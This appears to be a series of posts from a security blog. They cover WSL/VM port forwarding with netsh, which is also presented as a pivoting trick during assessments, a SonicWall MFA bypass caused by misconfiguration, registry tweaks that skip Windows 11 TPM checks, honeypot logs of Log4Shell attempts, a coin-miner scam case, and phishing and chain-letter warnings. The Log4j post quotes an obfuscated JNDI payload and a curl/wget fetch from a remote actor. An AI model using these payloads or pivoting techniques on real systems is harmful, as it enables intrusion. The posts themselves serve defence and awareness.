Sunday, September 11, 2022

Port forwarding from VM , Docker or WSL2 to host Windows 10 or 11 to allow remote access.

 

If you need to bypass NAT restriction on WSL or if you have a Virtual Machine that is NAT only in VirtualBox or VMware you can use these command on the host OS to enable port forwarding from the Host to the nested virtual machines.

Scenario,

HOST OS: windows 10 IP address 192.168.69.129

VM Ubuntu: on WSL2 IP address: 172.25.187.188

We have a Ubuntu box running on windows 10 WSL2, we have started a simple http server using python3 on port 9000, to allow this port access from the Host lan, we can use some of the netsh to expose that port to the wider network.

Now we need to proxy the port via the host to connect it to the VM running on WSL.

Below commands must be Run as administrator in Command Prompt

netsh interface portproxy add v4tov4 listenport=9000 listenaddress=192.168.69.129 connectport=9000 connectaddress=172.25.187.188


Now we need to enable this port via windows advance firewall:

netsh advfirewall firewall add rule name= "Open Port 9000" dir=in action=allow protocol=TCP localport=9000


Note 
This command will live after a reboot, so it is important to make sure you reset the port proxy sittings 

To see what ports you have enabled 
netsh interface portproxy show all 

To reset all ports 
netsh interface portproxy reset



Conclusion

This above trick can also be used during security assessment, In some situation you might land on a machine that is multi homed networked, meaning it has access to 2 networks, so this is a good way to proxy the port so you can remote access to it.

It can also be used in the cloud so you can redirect the traffic via another public IP. Example would be is you are in need of whitelisting, then you can use a windows VM running on a cloud provider that is then whitelisted at the client end, from home now you can connect to that port on the public IP of the VM you have in the cloud, that will then redirect you to the destination network.


Tuesday, August 30, 2022

SONICWALL TOTP MFA bypass due to misconfiguration

 

SONICWALL TOTP MFA bypass due to misconfiguration

Client of an organization called us asking how to resolve an issue that was suspected a 0 day vulnerability trying to figure out how someone bypassed MFA TOTP tokens, found out that they had 2 user’s groups, 1 calling LDAP the other are directly on the firewall. So when the user changed the name from the exact lower cases to anything like smith to sMiTh the firewall treated as 2 users with the 2nd bypassing the TOTP 2FA that would have been for that user.

All this was due to 2 distinct VPN groups assigned to a VPN interface at the same time one calling local accounts with TOTP enabled and the 2nd calling LDAP group vpnusers on the DC with no MFA TOTP option. Window server DC ignores Caps so it treats any name as lower cases, but not the firewall.

So these guys did everything right and still someone bypassed a security control measures due a misconfiguration that is not so obvious.


https://www.sonicwall.com/support/knowledge-base/how-do-i-configure-2fa-for-ssl-vpn-with-totp/190829123329169/


Thursday, December 23, 2021

Bypass security and TPM requirement on windows 11 for lab testing. .

 

  • For security and lab testing during windows 11 install, you have the ability to bypass some security requirement, during the install you will see a message stating, "This PC can't run Windows 11." Windows 11 setup blocked due to missing hardware requirements.  
  • When you see the above message, press Shift+F10 on your keyboard to launch a command prompt. Now type regedit and press enter to launch it. 


  • When the Registry Editor opens, navigate to: HKEY_LOCAL_MACHINE\SYSTEM\Setup, Right-click on the Setup key and select New > Key. 
  • When prompted to name the key, Type LabConfig and press enter. 
  • Next right-click on the LabConfig key and select New > DWORD (32-bit) value and create a value named BypassTPMCheck, and set its data to 1.  
  • Also create a DWORD 32 for (BypassSecureBootCheck) and set its value to 1. ( older machine that have no secure boot option, pre year 2010 ). 
  • For very OLD CPU's add this: \HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup then create DWORD 32 (AllowUpgradesWithUnsupportedTPMOrCPU) then set to 1,  would not install on a machine with less than a 2nd gen I5.


  • Now close all the new screens, press back, select the correct OS home/Pro etc. And you will no longer see the screen with the  "This PC can't run Windows 11." 



Monday, December 13, 2021

CVE-2021-44228 exploitation example Canada Cyber

 CVE-2021-44228 

CanadaCyber Honeynet logging data over last 3 days.

We see: 

Actions: "curl -s. RemoteActor:5874/CCyberPubIP:80||wget -q -O- , 

Most recent hits are coming up with obfuscation, 

RemoteActor HTTP/1.1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-"



Local Ottawa man laptop compromised by distributed Bitcoin miner.

 

Local Ottawa man laptop compromised by distributed Coin miner.

This all started with a phone call pretending to be the his local RRSPs representative, after some social engineering the hacker was able to get the 70-year-old man to install any desk software and provide the hacker remote access.  

A quick look in the download folder we can see:



Based on time stamps we can see that the hacker got in via legitimate version of AnyDesk. He then used locally saved banking information to create a bitcoin account, we also see evidence of banking transfer:


We later see the installation of variety of tools that allow the ability to the threat actor to install Coin mining software.

IOCs:

https://www.virustotal.com/gui/file/825729b8f0ce7215119a4035f6d0267a05466fd939f598f848341f3631a0a631

https://www.virustotal.com/gui/file/92b979d18973399b806f50bd4651445d7578f60c7a8b18e4ee761cd06de795e6

 

Other files of interest:

https://www.virustotal.com/gui/file/2294dbb4c42acca41c46ea5eebc3f5aa10ff1b0d200b4729fcefeda5321294ba/detection

https://www.virustotal.com/gui/file/930a03cb70737c49651fb96114fd3816aeb311d19cfadf312a35107924eca555

Tuesday, May 12, 2020

Be cautious of "Fake scary message, targeting children, Fake chain messages"


Be cautious of "Fake scary message, targeting children"
Below is not real, just a fake story, chain letters, chain e-mail, people send these to scare you thinking it's funny to see how many people pass them along, sometime they can have hidden code or URLs.







----------------------------------------------------- FAKE ------------------------------------------------------
Hi I am sorry I had to send this to you this but now that you have opened it you can’t stop reading this. Hi my name is Teresa Fidalgo I died 27 years. If you don’t send this to 20 people I will sleep by your side forever. If you don’t believe me search me up. Teresa Fidalgo. So send this to 20 people. A girl ignored this and her mum died 20 days later. NO SEND BACKS! Sorry to send this. Btw this is not fake search her up on google\ I dont want a death note for my momIf you were killed, I wouldn’t be at your funeral.๐Ÿ’€

๐Ÿ‘ŠI’d be in jail for killing the person who killed you.๐Ÿ‘Š
๐Ÿ‘ญWe are true friends.๐Ÿ‘ญ
๐Ÿ’We ride together, we die together.๐Ÿ’
๐Ÿ˜ŒSend this to everybody you care about, including me, if you care.๐Ÿ˜Œ
#⃣See how many times u get this.#⃣
๐Ÿ’ฏI want you to know you are an amazing friend, till death and forever.๐Ÿ’ฏ
๐Ÿ˜žIf I don’t get this back, I understand.๐Ÿ˜ž
๐Ÿค—But I have a game for you.๐Ÿค—
๐Ÿค”Once you read this letter,
you must send this to 15 people,
including me.๐Ÿค”
❤If you get at least three back, you are loved.❤
๐Ÿ˜ฆNobody knows how important something is, until they lose it.๐Ÿ˜ฆ
๐Ÿ˜Tonight, (right at 12:00pm) the person you love will realize they love you.๐Ÿ˜
๐Ÿ˜ฏThen, at 1:00pm to 2:00pm, be ready for the shock of your life!๐Ÿ˜ฏ
๐Ÿ˜ฒIf you break this chain, you will have bad luck.๐Ÿ˜ฒ
๐Ÿ’“With love, send this to the 15๐Ÿ’“
๐Ÿ™If you don’t, you will turn ugly in one year.๐Ÿ™
๐Ÿ—ฃA friend told me to do this, so past it on.๐Ÿ—ฃ
๐Ÿ“ฒTomorrow, two boys/girls will ask if they can have your number?๐Ÿ“ฒ
๐Ÿ“…Send this message to 15 nice, people or bad luck starts for a whole year.๐Ÿ“…
๐Ÿ™…This is not fake.๐Ÿ™…
๐Ÿ™ŒApparently, if you copy and paste this, you will have the best day of your life tomorrow!๐Ÿ™Œ
๐Ÿ˜ผGood luck!
๐Ÿ˜ƒOh! And don’t send this to a group chat!!!
----------------------------------------------------- FAKE ------------------------------------------------------


REF: https://www.independent.co.uk/life-style/gadgets-and-tech/features/who-is-teresa-fidalgo-debunking-the-fake-ghost-story-thats-got-instagram-spooked-9573936.html

REF: https://www.consumer.ftc.gov/articles/how-recognize-and-report-spam-text-messages

REF: https://en.wikipedia.org/wiki/Chain_letter



Wednesday, April 15, 2020

Be cautious of Fake “Your Income Tax Reminder”

If you receive an email with the subject line  "Tax Refund available",or "Your Income Tax Reminder" it's fake do not click on it. 

If you have received an email that looks like this, it's fake do not fill it or click on it

You are eligible to receive a refund of 520.00 CAD.

You have tax returns for period ending 15 Apr 2019, due 15 Apr 2020, now available for refund!

Remember: We tried to send it to you automatically but were unable to do so as we don't have your details on file.

Ready to refund it now?

 

  • Have your credit/debit card ready.
     
  • Open the application form below in your browser and login to your myIR account.
     
  • Follow the instructions on your screen.
Remember, If you are not the intended recipient of this email, please reply to inform us that you have received this email in error and then delete it without retaining any copy.

Note: Make sure all your income, benefits and family details are up to date in myIR, this will help make sure you're getting the right entitlements.

If you click on the link it will send you to a landing page that will extract your information and steal your Personal Identifiable Information PII.

Again above is not the real CRA PAGE.